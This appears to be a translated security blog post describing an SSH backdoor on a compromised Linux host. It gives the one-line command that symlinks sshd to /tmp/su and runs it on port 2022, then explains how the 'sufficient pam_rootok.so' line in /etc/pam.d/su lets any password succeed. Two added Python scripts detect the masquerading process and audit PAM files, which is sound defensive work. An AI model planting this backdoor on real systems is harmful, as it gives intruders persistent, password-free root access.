
Using a System Feature to Disguise a Password-Free Login Backdoor

0x00. Introduction

This is a backdoor that relies on a small trick. If you have penetrated a system, obtained a root shell, and the target's firewall imposes no restrictions, the method in this post lets you run an SSH backdoor that root can log in to without any password. It can fool system administrators who lack security awareness and experience. On the compromised host, run the following command to start the SSH backdoor:

ln -sf /usr/sbin/sshd /tmp/su;nohup /tmp/su -oPort=2022 &

Then open a new login session and test it:

Account root, any password at all

Login succeeded
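From the defender's side, the backdoor started above leaves a distinctive trace: the listening process runs under the name su (its comm and argv[0]), yet /proc/<pid>/exe still resolves to the real sshd binary, and it was launched from /tmp. The script below, an added example that is not part of the original post, flags exactly that mismatch. The record format, the list of world-writable directories and the sample process table are my own assumptions; the analysis takes plain records so it runs over the constructed sample offline and over a live Linux /proc via collect_from_proc().

```python
"""Flag an sshd binary running under a borrowed process name (Linux).

Added example, not part of the original post. The backdoor symlinks
/usr/sbin/sshd to /tmp/su and starts it, so the listener's name is "su"
while /proc/<pid>/exe still resolves to the real sshd. The analysis takes
plain records so it can run over constructed data as well as a live /proc.
"""
import os
from dataclasses import dataclass


@dataclass
class ProcRecord:
    pid: int
    comm: str        # /proc/<pid>/comm: the name the process runs under
    exe: str         # resolved target of /proc/<pid>/exe
    cmdline: list    # argv as a list of strings


SSHD_BASENAME = "sshd"
# Assumption: directories where a dropped symlink would typically live.
WORLD_WRITABLE_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


def find_masquerading_sshd(records):
    """Return [(pid, [reasons])] for processes whose executable is sshd but
    whose comm or argv[0] says otherwise, or that were started from a
    world-writable directory. Explicit port options are added as context."""
    findings = []
    for r in records:
        # /proc/<pid>/exe may carry a " (deleted)" suffix; strip it first.
        if os.path.basename(r.exe.split(" (deleted)")[0]) != SSHD_BASENAME:
            continue
        argv0 = r.cmdline[0] if r.cmdline else ""
        reasons = []
        if r.comm != SSHD_BASENAME:
            reasons.append(f"comm={r.comm!r} but exe is {r.exe}")
        if os.path.basename(argv0) != SSHD_BASENAME:
            reasons.append(f"argv0={argv0!r} but exe is {r.exe}")
        if any(argv0.startswith(d + "/") for d in WORLD_WRITABLE_DIRS):
            reasons.append("started from a world-writable directory")
        if reasons:
            ports = [a for a in r.cmdline[1:]
                     if a.startswith("-oPort=") or a.startswith("-p")]
            if ports:
                reasons.append("explicit port option(s): " + " ".join(ports))
            findings.append((r.pid, reasons))
    return findings


def collect_from_proc(proc="/proc"):
    """Build records from a live /proc; run as root to see every process."""
    records = []
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        base = os.path.join(proc, entry)
        try:
            exe = os.readlink(os.path.join(base, "exe"))
            with open(os.path.join(base, "comm")) as f:
                comm = f.read().strip()
            with open(os.path.join(base, "cmdline"), "rb") as f:
                argv = [a.decode(errors="replace")
                        for a in f.read().split(b"\0") if a]
        except OSError:
            continue  # kernel threads, exited processes, or no permission
        records.append(ProcRecord(int(entry), comm, exe, argv))
    return records


# Constructed sample: a normal sshd, the backdoor from the post, and a real su.
SAMPLE_RECORDS = [
    ProcRecord(615, "sshd", "/usr/sbin/sshd", ["/usr/sbin/sshd", "-D"]),
    ProcRecord(4042, "su", "/usr/sbin/sshd", ["/tmp/su", "-oPort=2022"]),
    ProcRecord(4100, "su", "/usr/bin/su", ["su", "-"]),
]

if __name__ == "__main__":
    for pid, reasons in find_masquerading_sshd(SAMPLE_RECORDS):
        print(pid, "; ".join(reasons))
```

Only the second record is reported; the genuine su and the genuine sshd pass untouched. Checking the exe link rather than the process name is the point: a renamed binary or symlink changes comm and argv[0], but not what the kernel actually mapped.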

0x01. Why the login needs no password

The backdoor above runs under the process name su. When a user logs in, the system looks for a file named su under /etc/pam.d/ (it does not have to be su: as long as /etc/pam.d contains a file with the same name as the backdoor's process name, the system reads that file during authentication). Its contents are shown below for reference (Kali 2 system):

    #
    # The PAM configuration file for the Shadow `su' service
    #

    # This allows root to su without passwords (normal operation)
    auth       sufficient pam_rootok.so

    # Uncomment this to force users to be a member of group root
    # before they can use `su'. You can also add "group=foo"
    # to the end of this line if you want to use a group other
    # than the default "root" (but this may have side effect of
    # denying "root" user, unless she's a member of "foo" or explicitly
    # permitted earlier by e.g. "sufficient pam_rootok.so").
    # (Replaces the `SU_WHEEL_ONLY' option from login.defs)
    # auth       required   pam_wheel.so

    # Uncomment this if you want wheel members to be able to
    # su without a password.
    # auth       sufficient pam_wheel.so trust

    # Uncomment this if you want members of a specific group to not
    # be allowed to use su at all.
    # auth       required   pam_wheel.so deny group=nosu

    # Uncomment and edit /etc/security/time.conf if you need to set
    # time restrainst on su usage.
    # (Replaces the `PORTTIME_CHECKS_ENAB' option from login.defs
    # as well as /etc/porttime)
    # account    requisite  pam_time.so

    # This module parses environment configuration file(s)
    # and also allows you to use an extended config
    # file /etc/security/pam_env.conf.
    #
    # parsing /etc/environment needs "readenv=1"
    session       required   pam_env.so readenv=1
    # locale variables are also kept into /etc/default/locale in etch
    # reading this file *in addition to /etc/environment* does not hurt
    session       required   pam_env.so readenv=1 envfile=/etc/default/locale

    # Defines the MAIL environment variable
    # However, userdel also needs MAIL_DIR and MAIL_FILE variables
    # in /etc/login.defs to make sure that removing a user
    # also removes the user's mail spool file.
    # See comments in /etc/login.defs
    #
    # "nopen" stands to avoid reporting new mail when su'ing to another user
    session    optional   pam_mail.so nopen

    # Sets up user limits according to /etc/security/limits.conf
    # (Replaces the use of /etc/limits in old login)
    session    required   pam_limits.so

    # The standard Unix authentication modules, used with
    # NIS (man nsswitch) as well as normal /etc/passwd and
    # /etc/shadow entries.
    @include common-auth
    @include common-account
    @include common-session

The key line is this one:

    auth       sufficient pam_rootok.so

sufficient means that as soon as this line's check passes, authentication returns success immediately.

Next, let's look at what the Linux man page says about pam_rootok.so:

This authentication module checks whether your UID is 0 and returns the PAM result accordingly (0 means OK, anything else is not OK).

Looking at the source code of pam_rootok.so, we find:

The key point is the part in the red box: the module calls getuid(); if the uid it gets is 0, it then checks whether the SELinux root check returns 0 (or returns 0 with SELinux enabled); if so, it returns authentication success, otherwise authentication fails.

So where does getuid() get its value from? Looking it up:

It comes from the user id of the process running the backdoor. As long as the backdoor process runs as a user with uid 0, any user can log in without a password.

Try an ordinary user instead:

Password-free login succeeded
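The root cause explained above is a configuration property, not a bug in sshd: OpenSSH's PAM code uses its own program name as the PAM service name (unless it was built with SSHD_PAM_SERVICE defined), so a uid-0 daemon named after any /etc/pam.d file whose auth stack starts with "sufficient pam_rootok.so" authenticates every user without a password. The audit below, an added example that is not part of the original post, reads PAM service files and reports which ones have that property, so an administrator can see which names are dangerous to inherit. The {name: contents} mapping, the constructed sample files and the simplified control-flag semantics are my own assumptions.

```python
"""Audit /etc/pam.d for services where uid 0 authenticates without a password.

Added example, not part of the original post. It reports which PAM service
files let a uid-0 daemon bypass the password via "auth sufficient
pam_rootok.so". It takes a {name: contents} mapping, so it runs over the
constructed sample below or over a real directory via load_pam_dir().
"""
import os


def parse_pam_lines(text):
    """Yield (type, control, module, args) tuples from one PAM file.
    '@include' lines yield ('@include', <name>, '', [])."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blanks
        if not line:
            continue
        parts = line.split()
        if parts[0] == "@include":
            yield ("@include", parts[1], "", [])
            continue
        mtype = parts[0].lstrip("-")             # "-auth" = optional to load
        if parts[1].startswith("["):              # bracketed control with spaces
            end = next(i for i, p in enumerate(parts) if p.endswith("]"))
            control, rest = " ".join(parts[1:end + 1]), parts[end + 1:]
        else:
            control, rest = parts[1], parts[2:]
        yield (mtype, control, rest[0] if rest else "", rest[1:])


def auth_stack(service, files, _seen=None):
    """Flatten the 'auth' lines of a service, following @include recursively."""
    if _seen is None:
        _seen = set()
    if service in _seen or service not in files:
        return []
    _seen.add(service)
    stack = []
    for mtype, control, module, args in parse_pam_lines(files[service]):
        if mtype == "@include":
            stack.extend(auth_stack(control, files, _seen))
        elif mtype == "auth":
            stack.append((control, module, args))
    return stack


def root_bypasses_password(service, files):
    """True if 'sufficient pam_rootok.so' comes before any required/requisite
    auth module. Simplification: a required module that ran earlier would
    already have demanded a password, so rootok after it is not a bypass."""
    for control, module, _ in auth_stack(service, files):
        if control == "sufficient" and module == "pam_rootok.so":
            return True
        if control in ("required", "requisite"):
            return False
    return False


def services_with_root_bypass(files):
    """Sorted names of service files whose auth stack has the bypass."""
    return sorted(name for name in files if root_bypasses_password(name, files))


def load_pam_dir(path="/etc/pam.d"):
    """Read a real PAM directory into the mapping the audit functions expect."""
    files = {}
    for name in os.listdir(path):
        full = os.path.join(path, name)
        if os.path.isfile(full):
            with open(full, errors="replace") as f:
                files[name] = f.read()
    return files


# Constructed sample, modelled on the Debian/Kali "su" file quoted above and
# a typical sshd file that only includes the common stack.
SAMPLE_FILES = {
    "su": "auth       sufficient pam_rootok.so\n"
          "session    required   pam_limits.so\n"
          "@include common-auth\n",
    "sshd": "@include common-auth\n"
            "account    required   pam_nologin.so\n",
    "common-auth": "auth  [success=1 default=ignore]  pam_unix.so nullok\n"
                   "auth  requisite  pam_deny.so\n"
                   "auth  required   pam_permit.so\n",
}

if __name__ == "__main__":
    for name in services_with_root_bypass(SAMPLE_FILES):
        print(f"{name}: a uid-0 daemon named {name!r} authenticates without a password")
```

On the sample, only su is reported: its stack opens with the sufficient pam_rootok.so line, while sshd's stack goes straight to pam_unix.so and then a requisite pam_deny.so. Running the same audit over load_pam_dir() on a real host lists every service name whose stack a renamed daemon could inherit, which, together with the exe-link check on listening processes, is what a defender needs to spot or rule out this trick.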